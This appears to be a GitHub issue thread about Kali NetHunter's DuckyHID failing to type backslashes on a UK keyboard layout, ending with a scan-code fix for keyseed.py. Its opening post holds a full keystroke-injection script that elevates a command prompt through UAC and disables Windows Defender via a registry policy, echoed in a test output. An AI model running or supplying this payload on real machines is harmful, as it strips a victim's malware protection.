### ISSUE TITLE
Nexus 6P - Ducky HID - Pausing Script when "\" needs to written

### ISSUE THREAD

**Issue by ghost** [offensive-security/kali-nethunter#356]
When using the DuckyHID functionality within Nethunter using the following script the DuckyHID stops writing the powershell code at "\" and then stops.

Has this issue occurred before?

<code>
REM **\* Initial Delay **\* 
DELAY 2000

REM **\* Bypass UAC ***

GUI r

DELAY 250

STRING powershell Start-Process cmd.exe -Verb runAs

ENTER

DELAY 1500

ALT y

DELAY 500

REM **\* Open Powershell ***

STRING powershell

ENTER

DELAY 500

REM **\* Disable Windows Defender ***

STRING Set-ItemProperty -Path @HKLM:/SOFTWARE/Policies/Microsoft/Windows Defender@ -Name DisableAntiSpyware -Value 0x0000001

ENTER

DELAY 250

STRING Exit

ENTER

STRING Exit

Enter
</code>

Below is where the Ducky stopped:

![poweshell_pause](https://cloud.githubusercontent.com/assets/16455724/12578267/9f7133bc-c417-11e5-9867-d9375ccb0eb2.png)

**Comment by binkybear** [comment]
@connectionterminated: Tested your script on OnePlus 1 and this was output:
```sh
powershell Start-Process cmd.exe -Verb runAs
powershell
Set-ItemProperty -Path @HKLM:/SOFTWARE/Policies/Microsoft/Windows Defender@ -Name DisableAntiSpyware -Value 0x0000001
Exit
Exit
```
I can't reproduce your error (I don't own a Nexus 6P either).  I saved your example as a text file and loaded it in duckhunter.

**Comment by connectionterminated** [comment]
I forgot to say I was using the British Keyboard.

**Comment by binkybear** [comment]
Probably would be better to add something to keyseed.py: https://github.com/offensive-security/nethunter-app/blob/6015e7e4a63903e616c5571997030336513fb233/assets/nh_files/modules/keyseed.py#L860

If you are up to the challenge feel free to submit a PR.  It should match similar to: https://github.com/offensive-security/nethunter-app/blob/6015e7e4a63903e616c5571997030336513fb233/assets/nh_files/modules/keyseed.py#L6 and would match this reference: https://github.com/midnitesnake/USB-Rubber-Ducky/blob/master/Encoder/resources/gb.properties.

I don't have a UK layout to test but feel free to modify keyseed.py and push changes.  It's located on your sdcard in nh_files/modules/keyseed.py.

**Comment by Bascard** [comment]
Hello Guys,
I have a problem with the nexus 6p too. Wifite, Hid, and duckhunter attacks won't work.
wifite stucks at scanning for wifi networks...
hid and duckhunter hid attack says, that their launched but nothing happens on the computer.
Any ideas?
PS:sry for bad english, iam from Germany :D

**Comment by rudolfbono** [comment]
Is the 'mac changing' functionality working on Nexus 6P?

**Comment by AlexMorasUK** [comment]
Hi, same issue with British Keyboard layout on Nexus 7 2012 with Nethunter 2012. Issue relates to the keyseed.py but I can't work out how to fix it as I don't have a good enough understanding of USB scan codes.

**Comment by AlexMorasUK** [comment]
**Fix for UK Keyboard Layout**

I've worked it out, modify your keyseed.py file in nh_files/modules.
In `'uk' : {...}`:
Add this line to define the UK \ `"\x5C": "\\x00\\x00\\x00\\x64\\x00\\x00\\x00\\x00",`
Add this line to define the UK | `"\x7C": "\\x02\\x00\\x00\\x64\\x00\\x00\\x00\\x00",`

In `'uk_bin' : {...}`:
Add this to define letter G and g (not sure why for this one) - only if you're having issues with it.
`"\x47": "left-shift g",
"\x67": "g",`

On US keyboards the \| uses the code \x31. On UK keyboards this is relabeled for the #~ key leaving the UK version of the \| undefined.

This fixed it for me so let me know if you run into any trouble and I'll see if I can work it out. :)
